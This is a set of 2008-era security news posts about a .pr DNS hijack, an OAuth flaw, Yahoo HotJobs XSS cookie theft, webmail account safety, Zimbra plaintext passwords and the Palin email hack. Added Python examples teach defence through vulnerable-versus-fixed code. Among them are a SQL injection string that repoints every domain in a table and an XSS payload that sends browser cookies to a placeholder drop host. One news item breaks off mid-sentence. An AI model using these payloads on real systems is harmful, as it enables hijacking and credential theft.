An attack on the registrar that manages Puerto Rico's top-level domain led to the local (.pr) Web sites of Google, Microsoft, Yahoo, Coca-Cola, and other big companies being redirected for a few hours on Sunday to defaced pages, according to security firm Imperva.
Those sites and others, including PayPal, Nike, Dell, and Nokia, were redirected to pages that were black except for messages in hacker lingo saying that the sites had been hacked. The sites themselves were not hacked, however, Amichai Shulman, chief technology officer at Imperva, said on Monday; what the attackers changed were the DNS records that direct visitors to them.
A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system, he said. "We're seeing more and more of these DNS-related attacks and seeing them scale up," he added.
The defaced pages were obviously not the legitimate sites, but the same technique could send unsuspecting Web surfers to a convincing phishing copy of, say, a bank's site and prompt them for sensitive information. Because the redirect happens in DNS, the address bar still shows the legitimate domain name, so the usual advice to check the URL does not help here.
People should use the SSL (Secure Sockets Layer) protocol for sensitive sites: a server reached through a hijacked DNS record does not hold the real site's certificate and private key, so the browser will warn about the certificate before the page loads. Browser anti-phishing features that color part of the address bar green or red according to the reputation of the site being visited add a second check.
Calls to Gauss Research Lab, the organization that manages Puerto Rico's top-level domain, were not answered late on Monday.
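The "Peace Crew" claim above is that a SQL injection in the registrar's management system let them repoint delegations. The following is an added example, not code from the article or from the registrar, that models that failure against an in-memory SQLite table: the schema, the three sample domains, the `update_ns_*` functions and the attacker's name server are all assumptions for illustration. The vulnerable version builds its statement by string formatting, so a crafted "domain" field rewrites the WHERE clause and every domain in the table is repointed; the parameterised version leaves the table untouched.

```python
import sqlite3

# Constructed sample of a registrar's delegation table: domain -> name server, plus who may edit it.
SEED_DOMAINS = [
    ("example-a.pr", "ns1.legit-a.example"),
    ("example-b.pr", "ns1.legit-b.example"),
    ("example-c.pr", "ns1.legit-c.example"),
]

ATTACKER_NS = "ns1.attacker.example"   # assumed attacker-controlled name server


def fresh_db():
    """In-memory registrar database seeded with three domains, each owned by a different customer."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE domains (name TEXT PRIMARY KEY, ns TEXT NOT NULL, owner TEXT NOT NULL)"
    )
    db.executemany(
        "INSERT INTO domains VALUES (?, ?, ?)",
        [(name, ns, "owner-" + name.split(".")[0]) for name, ns in SEED_DOMAINS],
    )
    db.commit()
    return db


def update_ns_vulnerable(db, owner, domain, new_ns):
    """Vulnerable: the statement is assembled by string formatting.

    The WHERE clause is meant to limit the change to one domain the caller owns,
    but a quote inside `domain` lets the caller rewrite that clause.
    """
    sql = "UPDATE domains SET ns = '%s' WHERE name = '%s' AND owner = '%s'" % (
        new_ns, domain, owner,
    )
    db.execute(sql)
    db.commit()
    return sql  # returned so the reader can see what actually ran


def update_ns_safe(db, owner, domain, new_ns):
    """Fixed: bound parameters travel separately from the SQL text, so input is never parsed as SQL."""
    db.execute(
        "UPDATE domains SET ns = ? WHERE name = ? AND owner = ?",
        (new_ns, domain, owner),
    )
    db.commit()


def delegations(db):
    """Current name server for every domain, as {name: ns}."""
    return dict(db.execute("SELECT name, ns FROM domains ORDER BY name"))


# A customer who legitimately owns example-a.pr submits this as the "domain" field.
# The comment marker (--) discards the rest of the clause, including the owner check,
# so the vulnerable version repoints every delegation in the table.
INJECTED_DOMAIN = "x' OR 1=1 --"


def demo():
    """Run the same request through both versions; return the two resulting delegation tables."""
    vuln = fresh_db()
    update_ns_vulnerable(vuln, "owner-example-a", INJECTED_DOMAIN, ATTACKER_NS)
    safe = fresh_db()
    update_ns_safe(safe, "owner-example-a", INJECTED_DOMAIN, ATTACKER_NS)
    return delegations(vuln), delegations(safe)


if __name__ == "__main__":
    after_vuln, after_safe = demo()
    print("vulnerable:   ", after_vuln)   # every domain now points at ns1.attacker.example
    print("parameterised:", after_safe)   # unchanged: no domain is literally named "x' OR 1=1 --"
```

The scale matters here as much as the bug: one injected request against the registrar changes the delegation for every domain the table holds, which is why a single management-system flaw took many unrelated companies' sites offline at once.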
This is the message the hackers left on sites affected by the DNS redirect attack, according to mirrors of the defacements captured by Zone-H.org. (Credit: Zone-H.org)
A security hole in OAuth, the open-source protocol that acts as a "valet key" for users' log-in information, has led services like Twitter and Yahoo to temporarily pull their support, CNET News has learned.
Some developers were dismayed when Twitter pulled its support for OAuth, which it had only recently started to implement: blogger Jesse Stay wrote in a post about other restrictions to Twitter's developer API that its removal of OAuth is one of a number of recent examples of how the microblogging service has "pulled the rug out from under its developers."
In the interest of online safety, CNET News has chosen not to make the details of the security hole public. Here are the basics: The hole makes it possible for a hacker to use social-engineering tactics to trick users into exposing their data. The OAuth protocol itself requires tweaking to remove the vulnerability, and a source close to OAuth's development team said that there have been no known violations, that it has been aware of it for a few days now, and has been coordinating responses with vendors. A solution should be announced soon.
This is a particularly big deal for Twitter, as OAuth prevents users of a service from having to hand over their passwords to third-party services that use that service's application program interface (API), and Twitter relies heavily on developer-created enhancements to the service from clients like Twhirl and TweetDeck to statistics and analytics applications.
"OAuth is still in beta, for what it's worth," Twitter API lead Alex Payne said in (of course) a Twitter message on Wednesday. "We should have the current issue with it resolved soon."
Eran Hammer-Lahav, the OAuth community coordinator for this specific threat, spoke to CNET News later on Wednesday afternoon. "We have been aware of this threat for about a week now, and we have been coordinating with all known providers to help them understand the threat and deploy whatever mitigating factors they can," Hammer-Lahav said, adding that full details will be made available on the OAuth Web site at midnight Pacific time on Thursday. "There are no known exploits of this, so there are no reported attacks and the providers have either already deployed matters to address this or are doing it right now."
He highlighted Twitter's role in helping to keep things on the down-low at its own expense; when the service disabled OAuth, it did not mention that there was a security hole at its root.
"The community is extremely grateful to Twitter, despite the fact that they have been standing alone in the line of fire and taking the heat for this threat as if it was their own issue," Hammer-Lahav explained. "They basically took the PR hit in order to allow other companies to address it. They were doing it not to protect themselves, but to protect other companies."
Twitter co-founder Biz Stone responded to the threat on the company blog: "We take security seriously and felt the responsible thing to do was temporarily disable OAuth while this matter was sorted out. Yahoo and others made similar decisions," Stone wrote. "The developers working on Twitter projects that are in our beta test group felt this disruption the hardest and their patience is extremely appreciated."
This post was last expanded at 1:36 p.m. PT.
This was originally posted at ZDNet's Between the Lines.
Yahoo said Wednesday that it will make its user logs anonymous within 90 days as it ups the ante on data retention policies.
In a statement, Yahoo said it would also make user data on page views, page clicks, ad views, and ad clicks anonymous as well as its user logs. The only exceptions would be for "fraud, security, and legal obligations."
Clearly, Yahoo, Google, and others are competing to shorten their data retention periods. In particular, Google and Yahoo have been playing a game of privacy leapfrog.
In September, Google said it would make its user logs anonymous after 9 months, a vast improvement over its previous 18-month policy. Google, which was pressured by regulators, said that 9 months was a good balance between "sometimes conflicting factors like privacy, security, and innovation." In July 2007, Yahoo went with a 13-month purge policy.
Anne Toth, Yahoo's head of privacy, said that 90 days was the minimum time it needed to retain user data for business purposes. Yahoo reached that conclusion after a review of its data policies across the globe and consulting business, engineering, governance, and product teams.
As for the exceptions Yahoo said:
To protect users and our business partners, there will be some specific and limited exceptions to the anonymization policy. In order to fight fraud and preserve system security, Yahoo will retain system specific data in identifiable form for no more than 6 months--but only for this purpose. Yahoo may have to retain data for longer periods to meet other legal obligations.
You know all those hoax e-mails that arrive in your inbox saying that you've won a lottery? You don't click on them, obviously, but many people do, enough to prompt Microsoft and Yahoo to form a coalition to warn consumers about the scam.
Microsoft, Yahoo, Western Union, and The African Development Bank are partnering to educate Internet users about the dangers of falling prey to the fake lottery winner e-mails.
In such scams, victims are told that they have won a lottery, often in a foreign country, and are then asked to provide their personal and financial information to claim the winnings. In the current economic downturn, the fear is that desperate people will be more likely to take the bait.
The announcement of the coalition, made at the 6th German Anti Spam Summit in Wiesbaden, Germany, coincided with the release of Microsoft-commissioned research on lottery scams in Europe.
Of 4,930 people surveyed, 113 people reported losing money to an Internet fraudster in the last year. Twenty-seven percent of Internet users surveyed predicted they would become a victim of a lottery scam and more than half said lottery scam e-mails scared them off from buying things online.
Yahoo's HotJobs site is vulnerable to a phishing-based attack that can give an attacker access to a Yahoo member's mail and other personal accounts, British network service firm Netcraft said Monday, and someone has been taking advantage of it.
In phishing, an attacker sends a bogus e-mail masquerading as a legitimate message from a company, in this case Yahoo HotJobs. Here the link in the e-mail carries specially formatted JavaScript in one of its parameters; because of a cross-site scripting vulnerability, the HotJobs page echoes that parameter back into the page without encoding it, so the victim's browser runs the attacker's script as if it were part of a yahoo.com page, Netcraft said.
"The script steals the authentication cookies that are sent for the yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Netcraft said Monday. "Netcraft has informed Yahoo of the latest attack, although at the time of writing, the HotJobs vulnerability and the attacker's cookie harvesting script are both still present."
I'll update this post once Yahoo gets back to me with any comment.
Update 3:44 p.m. PDT: Yahoo acknowledged the vulnerability but said it's fixed now.
"The team was made aware of this particular cross-site scripting issue yesterday morning (Sunday, October 26) and a fix was deployed within a matter of hours. Yahoo appreciates Netcraft's assistance in identifying this issue," the company said in a statement. "As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com."
Yahoo wouldn't comment on how many people might have been affected.
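To make the HotJobs attack concrete, here is an added example (not code from Netcraft, Yahoo, or the article) of a reflected cross-site scripting bug beside its fix. The page template, the `jobs.example` host, the `collector.invalid` drop host and the payload are all assumptions; the real HotJobs page and the attacker's script are not reproduced on this page. The vulnerable renderer echoes the search term straight into the HTML, so a `q` parameter from a phishing link becomes a live `<script>` that ships `document.cookie` off-site; the fixed renderer HTML-encodes the term, and a `Set-Cookie` check shows the separate mitigation (HttpOnly) that keeps session cookies out of `document.cookie` even when a script does run.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholder drop host the stolen cookies are sent to; not a real server.
COLLECTOR = "http://collector.invalid/c"

# Constructed payload of the kind a phishing link would carry: it closes the input
# attribute the site echoes the term into, then sends document.cookie off-site
# through an image request (no user interaction needed).
XSS_PAYLOAD = (
    '"><script>new Image().src="' + COLLECTOR
    + '?c="+encodeURIComponent(document.cookie)</script>'
)

# Assumed page template: the search term lands both inside an attribute and in body text.
TEMPLATE = '<form action="/search"><input name="q" value="%s"></form><p>Results for %s</p>'


def phishing_link():
    """The link that would appear in the bogus e-mail (assumed host and path)."""
    return "http://jobs.example/search?" + urlencode({"q": XSS_PAYLOAD})


def query_from_link(link):
    """Extract the q parameter the way the server's request parser would."""
    return parse_qs(urlsplit(link).query).get("q", [""])[0]


def render_search_vulnerable(query):
    """Reflected XSS: the search term is inserted into the page untouched."""
    return TEMPLATE % (query, query)


def render_search_fixed(query):
    """Output encoding: <, >, &, ' and " become entities, so the browser treats the
    term as text wherever in the page it lands."""
    q = html.escape(query, quote=True)
    return TEMPLATE % (q, q)


def contains_live_script(page):
    """Crude stand-in for the browser: is there an un-encoded <script> element in the output?"""
    return "<script>" in page


def cookie_readable_by_script(set_cookie_header):
    """True when the cookie lacks HttpOnly, so document.cookie (and this payload) can read it.

    HttpOnly limits what an injected script can steal; it does not fix the XSS itself,
    and the script could still act on the site on the victim's behalf.
    """
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


if __name__ == "__main__":
    term = query_from_link(phishing_link())
    print(render_search_vulnerable(term))   # contains a live <script> that reads document.cookie
    print(render_search_fixed(term))        # the same term, rendered inert as &lt;script&gt;...
```

Because the cookies in the Netcraft report were scoped to the `yahoo.com` domain rather than to HotJobs alone, a bug on one subdomain was enough to read them from any other; domain-wide cookies widen the blast radius of any single XSS.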
There was an interesting article recently in The New York Times about getting locked out of a Gmail account.
In August, blogger Alan Shimel of StillSecure wrote about his problems regaining access to a Yahoo e-mail account. Suffice it to say that if someone learns your Web mail password, it's a very difficult situation--one that may not end well.
For one thing, the Web mail provider may not know enough about you to determine the true account owner. Worse still, anyone using a free Web mail account from Google (Gmail), Yahoo, or Microsoft (Hotmail) can't expect to talk to a human being to resolve a problem with their account. Talking to a person at Google requires a subscription to Google Apps Premier Edition for $50 a year. Microsoft and Yahoo similarly offer telephone support only to "premium" customers.
If you care about a Web mail account, then some homework may be in order.
Alternate e-mail address
One thing Web mail users should have associated with their account is an alternate e-mail address. This is typically optional, but it can be critical, should you get locked out. I think you're safer not using an address from the same provider as your alternate. That is, don't provide a Gmail e-mail address as the alternate for a Gmail account. Too many eggs in one basket.
If you're like me, with no recollection or notes about the alternate e-mail address associated with your Web mail account, here's how to check (after first logging in to your account):
Gmail: Click on the "Settings" link in the top right corner, then go to the "Accounts" tab and click on the link in the "Google Account settings" section.
Classic Hotmail: Click on "Options" in the top right corner, then View and Edit your personal information. Your alternate e-mail address is displayed along with a link to change it.
Classic Yahoo: Click on "Options" in the top right corner, then "Mail Options", then (on the left) click on "Account Information" and re-enter your password. Yahoo will then display "Alternate Email 1" and "Alternate Email 2." Yahoo supports two alternate e-mail addresses, a great safety net, since our e-mail providers change over time.
Secure connections
Gmail, Hotmail, and Yahoo Mail all use a secure connection when you initially log on and enter your password. Hotmail and Yahoo then switch back to unencrypted HTTP, so the session cookie and the mail itself cross the network in the clear, readable by anyone on the same wireless network. Gmail offers an option to always use a secure HTTPS connection, even when reading and writing e-mail. Highly recommended.
To enable this feature, Gmail users should click on "Settings" in the top-right corner, then on the default "General" tab, scroll to the bottom of the page, and turn on the radio button to "Always use https."
Truthiness
Web mail may be one of those places where little white lies are acceptable. The governor of Alaska, who recently had her Yahoo e-mail exposed to the world, set herself up for failure by truthfully answering some questions.
Every Web mail system asks for personal information as a means of identification, should you lose your password. The problem is that this personal information can also be used by a bad guy to learn your password.
Yahoo and Hotmail limit their secret questions to a handful of preselected questions. The straw that broke the camel's back for the governor of Alaska was the question of where she met her spouse. Because she is a public figure, it took little guessing for someone to answer that correctly and fool Yahoo into thinking that person was the governor. There were some other canned questions too, but they were also easy to answer using public information.
Public figure or not, there is no reason to answer Web mail security questions truthfully. After all, who are you really lying to? A potential bad guy trying to learn your password.
So, when asked the name of your favorite teacher, feel free to respond "xyz" or with any random word or sentence that no one will guess. Then, of course, write it down in a safe place. The price for making up random answers is the burden of recovery. This is the eternal relationship between security and convenience. More security always entails less convenience.
Gmail is the most flexible of the major providers. It lets you choose your own secret question, thus giving you a fighting chance of picking a question to which no one else knows the answer. Still, if you have a safe place for storing passwords, a totally random answer can't be guessed.
To review your security question in Gmail, click on the "Settings" link in the top-right corner, then go to the "Accounts" tab, and click on the "Google Account settings" link in the section of the same name. Finally, click on "Change security question." You will have to re-enter your Gmail password.
Users of the classic Hotmail system can review their security question by clicking on "options" in the top-right corner, then clicking on "View and edit your personal information."
Yahoo e-mail users may be in for a surprise. Simply knowing your password is not sufficient to view, let alone change, your security question. As described in How do I update my secret question? Yahoo requires you to "verify the Answer to your current Secret Question in order to update it." I'm screwed.
Does someone already know your password?
If someone learned your Web mail password, would you know? It's one thing to have your e-mail read, but it's another to have it read over and over, day after day, by someone who knows your password and is smart enough not to tip their hand by changing it.
Potentially, there is much that Web mail providers can do to let account owners know that someone else is logging into their account when they're asleep. As far as I can tell, Hotmail and Yahoo mail do absolutely nothing in this regard. Gmail, however, offers an audit trail, if you know where to look.
When Gmail users first log in, they should scroll down to the bottom of the initial page and look for a message such as:
Last account activity: 22 hours ago at IP 66.88.111.222. Details
or
Last account activity: 22 minutes ago on this computer. Details
If you didn't log in to your Gmail account at the time the message indicates, then either someone knows your password, or a mail client, phone, or other program you set up is fetching your mail on your behalf. The "Details" page lists the access type for each entry, which settles the question.
Internet Protocol addresses can be linked to both an Internet service provider and a country, for sure, and maybe even to a city within the country. For more on this, see my earlier posting "What does your IP address say about you?"
Clicking on the "Details" link offers a longer history of Gmail account activity and an indication of whether the account is currently logged on at another computer. Letting one person log in to a Gmail account simultaneously from two different computers strikes me as a design mistake. But given that design, Gmail users can log off other computers that are currently logged into the same account. Needless to say, this, too, can alert you that someone knows your password.
Information about the most recent Gmail account activity is presented on the bottom of every Gmail Web page. For more, see Last account activity in the Gmail Help.
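Gmail only shows the activity table; deciding whether an entry is suspicious is left to you. As an added example (not Google's code or the author's), here is the audit a practitioner would run over that table, with a constructed sample of entries in the shape of the "Details" page (start time, access type, IP). The owner's home network and sleeping hours are assumptions for the example. It flags three things: a login from outside the owner's usual networks, a login during hours the owner is asleep, and two logins close together from different addresses, which is the simultaneous-session situation the text describes.

```python
import ipaddress
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample of the activity table behind Gmail's "Details" link:
# session start, access type, client IP. Not real data; the addresses are documentation ranges.
ACTIVITY = """\
2008-10-26 08:02 Browser 203.0.113.25
2008-10-26 08:40 POP3    203.0.113.25
2008-10-26 19:15 Browser 203.0.113.25
2008-10-27 03:12 Browser 198.51.100.77
2008-10-27 03:30 Browser 198.51.100.77
2008-10-27 08:05 Browser 203.0.113.25
2008-10-27 08:20 Browser 198.51.100.77
"""

# Assumptions for the example: the networks the owner actually uses, the hours she is asleep,
# and how long after a login the session is assumed to still be open.
OWNER_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]
QUIET_HOURS = range(0, 6)
SESSION_WINDOW = timedelta(hours=1)


def parse_activity(text):
    """Turn the table into (datetime, access type, ip_address) rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, kind, ip = line.split()
        when = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M")
        rows.append((when, kind, ipaddress.ip_address(ip)))
    return rows


def audit(rows, owner_networks=OWNER_NETWORKS, quiet_hours=QUIET_HOURS, window=SESSION_WINDOW):
    """Return (reason, when, access type, detail) alerts for the rows.

    A POP3/IMAP client or a phone that fetches mail on your behalf also appears in this
    table, so look at the access type before concluding that someone else has the password.
    """
    alerts = []
    for when, kind, ip in rows:
        if not any(ip in net for net in owner_networks):
            alerts.append(("unknown-network", when, kind, str(ip)))
        if when.hour in quiet_hours:
            alerts.append(("quiet-hours", when, kind, str(ip)))
    # Two logins within one session window from different addresses: someone else
    # is in the account at the same time as (or right after) you.
    for i, (t1, k1, ip1) in enumerate(rows):
        for t2, k2, ip2 in rows[i + 1:]:
            if abs(t2 - t1) <= window and ip1 != ip2:
                alerts.append(("concurrent-different-ip", t2, k2, "%s vs %s" % (ip1, ip2)))
    return alerts


def summarize(alerts):
    """Count alerts by reason."""
    return Counter(alert[0] for alert in alerts)


if __name__ == "__main__":
    for reason, when, kind, detail in audit(parse_activity(ACTIVITY)):
        print("%-24s %s %-8s %s" % (reason, when, kind, detail))
```

The "unknown network" check is the one most worth keeping: the IP address on the "Last account activity" line tells you the provider and country of whoever logged in, and an address you have never used from is a stronger signal than the time of day alone.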
Test password recovery
Anyone involved in backing up computer files knows the importance of testing the recovery process, and the same applies with Web mail. The best way to ensure that you can recover or reset your password is to try it.
Yahoo password recovery (thanks to the governor of Alaska, it's now the infamous Yahoo password recovery) starts out by asking for your birthday, country of residence, and postal code. Without this gatekeeper information, knowing the secret question is useless. Even something as simple as your postal code needs to be saved rather than remembered because, as Yahoo points out, it may be from your home, your office, or a prior residence or prior work location.
Hotmail password recovery starts with the option to either "Use my location information and secret answer to verify my identity" or to "Send password reset instructions to me in e-mail." If you go the first route and answer the questions correctly, you get to choose a new password.
The location information is the same as Yahoo's--country, state, and ZIP code. If you go the second route, an e-mail message is sent to the alternate e-mail account with two links, one for confirming the request and resetting the password and another for doing nothing.
Google's account-recovery page isn't limited to password recovery; it deals with a whole host of problems accessing your account, including:
I forgot my password
I forgot my username
My account has been compromised
My password doesn't seem to be working
Loading issues
Another error or problem
If you forget a Gmail password, you're taken to a page where, as with the other two systems, you enter the user ID and pass a Captcha. At this point, there are no options: Google sends an e-mail to the alternate e-mail address. It doesn't display the entire alternate e-mail address (Hotmail, in contrast, does), just the domain name.
I tested this using a Yahoo.com e-mail address as the alternate to a Gmail account. Word to the wise: don't do this. The message from Gmail was treated as spam by Yahoo. The message includes a link that, when clicked, takes you to a Web page where you can enter a new password.
If you no longer have access to the alternate e-mail address, Google advises you to "...try the 'Forgot your password?' link again after five days. At that point, you'll be able to reset your password by answering the security question you provided when you created your account."
Web mail accounts may start out as toys or curiosities, but for many people, they end up being important. A little homework now may save a ton of grief later.
New security features planned for Zimbra will resolve an issue responsible for passwords being transmitted in the clear when accessing Yahoo Mail, a Yahoo spokeswoman said on Tuesday.
"Plain text authentication is an industry-wide challenge that major e-mail clients and providers face when providing the right balance of backward compatibility and security," a Yahoo spokeswoman said in an e-mail statement.
"Zimbra has plans as part of the next beta release to implement additional new security features to provide more secure authentication options. This approach will be in place in the next few weeks well before we launch the service out of beta," the statement said.
A Canadian programmer discovered the problem during a Yahoo University Hack Day at Waterloo University last week.
Passwords used to access Yahoo mail through the Zimbra client are sent over the Internet in clear text, a Canadian programmer says.
Holden Karau stumbled upon this problem while participating in the Yahoo University Hack Day at the University of Waterloo last week.
"The Yahoo imap server's used by the Yahoo Desktop don't support SSL and the password was being transmitted in plain text," Karau wrote in a blog post on Friday.
"What does this mean for you? If you use Zimbra to access your Yahoo mail, you almost certainly need to change your password and stop using Zimbra immediately (especially if you've ever done so over wireless)," he writes.
Not surprisingly, his hack didn't place in the competition. "In retrospect it probably wasn't the best forum to bring up the security defects, but it was the most convenient," Karau says.
He notified Yahoo about the problem during his presentation, but no one seemed concerned, he wrote in a post on Zimbra Forums.
A Zimbra representative wrote in a different post in that forum thread: "This problem has already been addressed in code, and fix is in the next release."
A Yahoo spokeswoman said she would check into the matter.
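What Karau describes is the client sending LOGIN to an IMAP server that offers no TLS. As an added example (not Zimbra's or Yahoo's code), here is the check a mail client should make before it ever sends a password: read the server's CAPABILITY response and refuse plaintext LOGIN unless TLS is already on (port 993) or the server advertises STARTTLS and the connection is upgraded first. The CAPABILITY strings are constructed illustrations in the shape RFC 3501 and RFC 2595 define; the Yahoo servers' real responses are not reproduced on this page. The `live_check` function uses only imaplib's documented `capability()` and `starttls()` calls and is not exercised offline.

```python
import re

# Constructed CAPABILITY responses in the shape an IMAP server returns; not Yahoo's real output.
SAMPLES = {
    "plaintext-only":    "* CAPABILITY IMAP4rev1 AUTH=PLAIN AUTH=LOGIN",
    "starttls-required": "* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED",
    "starttls-optional": "* CAPABILITY IMAP4rev1 STARTTLS AUTH=PLAIN",
}


def capabilities(response):
    """Parse a CAPABILITY line into an upper-cased set of tokens.

    Accepts the raw untagged line or the bare token list that imaplib.capability() returns.
    """
    if isinstance(response, bytes):
        response = response.decode("ascii", "replace")
    body = re.sub(r"^\*\s+CAPABILITY\s+", "", response.strip(), flags=re.I)
    return {tok.upper() for tok in body.split()}


def login_decision(caps, tls_active):
    """What the client may do before sending a password (LOGIN or AUTH=PLAIN).

    'send'            TLS is already on (port 993, or STARTTLS completed): the password is encrypted.
    'starttls-first'  Upgrade the connection, re-read CAPABILITY, then authenticate.
    'refuse'          No TLS path at all: LOGIN would put the password on the wire in the clear,
                      which is the situation the Zimbra/Yahoo report describes.

    A server that advertises LOGINDISABLED (RFC 2595) will itself reject LOGIN until
    STARTTLS is done; a client must not even try.
    """
    if tls_active:
        return "send"
    if "STARTTLS" in caps:
        return "starttls-first"
    return "refuse"


def plan_for_port(port, caps):
    """Port 993 is implicit TLS; 143 starts in the clear and depends on STARTTLS."""
    return login_decision(caps, tls_active=(port == 993))


def live_check(host, port=143):
    """Network version (not run in the example): ask a real server and apply the same rule."""
    import imaplib
    conn = imaplib.IMAP4_SSL(host, port) if port == 993 else imaplib.IMAP4(host, port)
    typ, data = conn.capability()
    decision = login_decision(capabilities(data[0]), tls_active=(port == 993))
    if decision == "starttls-first":
        conn.starttls()
        typ, data = conn.capability()   # the advertised set may change after the upgrade
        decision = login_decision(capabilities(data[0]), tls_active=True)
    conn.logout()
    return decision


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print("%-18s port 143 -> %-14s port 993 -> %s" % (
            name, plan_for_port(143, capabilities(line)), plan_for_port(993, capabilities(line))))
```

The "refuse" branch is the whole point: a client that silently falls back to plaintext when the server offers nothing better is exactly what makes a coffee-shop wireless network enough to capture the password.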
Sarah Palin (Credit: Alaska governor's office)
A grand jury in Chattanooga, Tenn., investigating who hacked Republican vice presidential candidate Sarah Palin's Yahoo e-mail ended its meeting on Tuesday without indicting a Tennessee lawmaker's son.
Speculation on the Internet has centered on 20-year-old David Kernell, a University of Tennessee student.
On the Internet forum 4Chan.org, where the e-mail break-in was first announced, posts attributed to someone named "Rubico" more or less described how the Yahoo account had been compromised using the password recovery feature. The e-mail address used for Rubico has been linked to Kernell.
Kernell's father, Democratic Tennessee state representative Mike Kernell, further fueled speculation last week when he confirmed his son was the subject of the investigation. On Saturday, investigators searched David Kernell's campus apartment.
Justice Department spokeswoman Laura Sweeney told the
There are mixed reports on Friday whether or not the son of a Tennessee state representative has been contacted by the FBI or Secret Service in connection with Sarah Palin's hacked Yahoo Mail account.
The father, Democratic Rep. Mike Kernell has told Knoxville News Sentinel and The Tennessean that despite a lot of online chatter, no formal contact has been made.
The person who gained access to Palin's e-mail account did so by guessing details of her life, then changed the e-mail password to "popcorn."
Using the online nickname Rubico, someone posted details of the hack to a forum on the 4Chan.org Web site starting on Tuesday. Password-protected zip files containing the contents of the now-deleted e-mail account once belonging to the Republican vice-presidential candidate have also been posted to the forum.
Subsequent posts by Rubico to the /b/ board over the last few days have provided additional insight into how the hack was carried out, although many of the posts have now been deleted.